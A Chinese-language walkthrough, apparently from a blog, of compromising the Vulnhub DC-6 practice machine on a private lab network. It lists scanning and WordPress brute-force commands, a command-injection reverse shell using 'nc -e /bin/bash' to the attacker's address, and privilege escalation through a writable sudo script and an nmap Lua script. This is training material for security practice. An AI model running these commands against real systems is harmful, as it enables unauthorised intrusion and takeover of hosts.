Vulnhub靶场 DC-6

目录

一、环境搭建

二、主机发现

三、漏洞复现

1、wpscan工具

2、后台识别 dirsearch

3、爆破密码

4、rce漏洞利用 activity monitor

5、rce写shell

6、新线索 账户

7、提权

8、拿取flag

四、总结


一、环境搭建

Vulnhub靶机下载:

官网地址:https://download.vulnhub.com/dc/DC-6.zip

虚拟机:VM虚拟机 或者VBOX 导入即可

网络环境:NAT

介绍:vulnhub是个提供各种漏洞平台的综合靶场,拿到root权限才可以发现最终的flag。

二、主机发现

查看服务

nmap -A -p- -v 192.168.176.144

修改本机hosts 进入网站

192.168.176.144 wordy

cms识别

很简单的一看,就是WordPress

三、漏洞复现

1、wpscan工具

wpscan --url http://wordy/ 直接扫描

wpscan --url http://wordy/ -e 查看用户

分别有:admin、mark、graham、sarah、jens 

2、后台识别 dirsearch

dirsearch -u http://192.168.176.144/ -e php

http://192.168.176.144/wp-admin/

3、爆破密码

hy

字典: /usr/share/wordlists kali自带 gunzip rockyou.txt.gz 解压

hydra -l mark -P /usr/share/wordlists ssh://192.168.176.144

wp

wpscan --url http://wordy/ --passwords /usr/share/wordlists/rockyou.txt

上面爆破无果

根据提升线索

https://img-blog.csdnimg.cn/4afcc591deda456ea6d9caaaa2033caf.png

cat /usr/share/wordlists/rockyou.txt | grep k01 > /home/kali/passwords.txt

把五个用户 生成了一个字典 vim username :admin、mark、graham、sarah、jens

wpscan --url http://wordy/ -U username.txt -P passwords.txt

找到一个:mark /helpdesk01

4、rce漏洞利用 activity monitor

登录网站发现了activity monitor 这个漏洞发现了activity monitor 这个漏洞

MSF 测试一下activity monitor漏洞利用

msfconsole
search activity monitormsf6 
set lport 1122
set password helpdesk01
set username mark
set rhosts 192.168.176.144
set ForceExploit true
run

没有利用成功

网站测试一下

可以看见 读取了目录信息

5、rce写shell

建立反向连接payload

ping 192.168.176.134| nc -e /bin/bash 192.168.176.134 9999

交互式shell

python -c "import pty; pty.spawn('/bin/bash')"

6、新线索 账户

寻找到了 graham的密码 GSo7isUM1D4

大体意思:

-恢复超级硬盘的全部功能(需要与Jens交谈)

-为莎拉的告别派对买礼物

-添加新用户:graham-GSo7isUM1D4-完成

-申请OSCP课程

-为Sarah的替代者购买新的笔记本电脑

ssh连接graham

ssh graham@192.168.176.144 -p 22

jens目录下有个backups.sh文件,使用命令sudo -l看看有哪些可执行的命令

sudo -l

发现graham用户可以无密码执行backups.sh文件,所以我们可以利用这个脚本获取到jens用户的shell

cat /dev/null > backups.sh 将脚本文件内容清空,

echo "/bin/bash" >> backups.sh 文件中写入/bin/bash

7、提权

查看jens用户的权限和可用的命令

发现jens用户可以无密码以root用户权限执行/usr/bin/nmap命令,

echo "os.execute('/bin/bash')" >> root1 将命令写入到root1文件中

sudo nmap --script=root1 来执行nmap命令进行提权

成功提权,然后再跳转到/root目录下即可看到flag

8、拿取flag

四、总结

1、熟悉ctivity monitor漏洞点

2、熟悉wp、hy暴力破解

3、熟悉nmap脚本提权

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2024-02-12 11:44:01       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-02-12 11:44:01       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-02-12 11:44:01       19 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-02-12 11:44:01       20 阅读

热门阅读

  1. 类与结构体(4)

    2024-02-12 11:44:01       28 阅读
  2. 只要努力,便会有收获

    2024-02-12 11:44:01       37 阅读
  3. ansible 基本用法

    2024-02-12 11:44:01       45 阅读
  4. m1芯片xcode15编译cocos2dx一些报错处理

    2024-02-12 11:44:01       35 阅读
  5. 逗女孩开心的python代码合集

    2024-02-12 11:44:01       31 阅读
  6. 什么是系统工程(字幕)24

    2024-02-12 11:44:01       29 阅读
  7. vue双向绑定的原理

    2024-02-12 11:44:01       30 阅读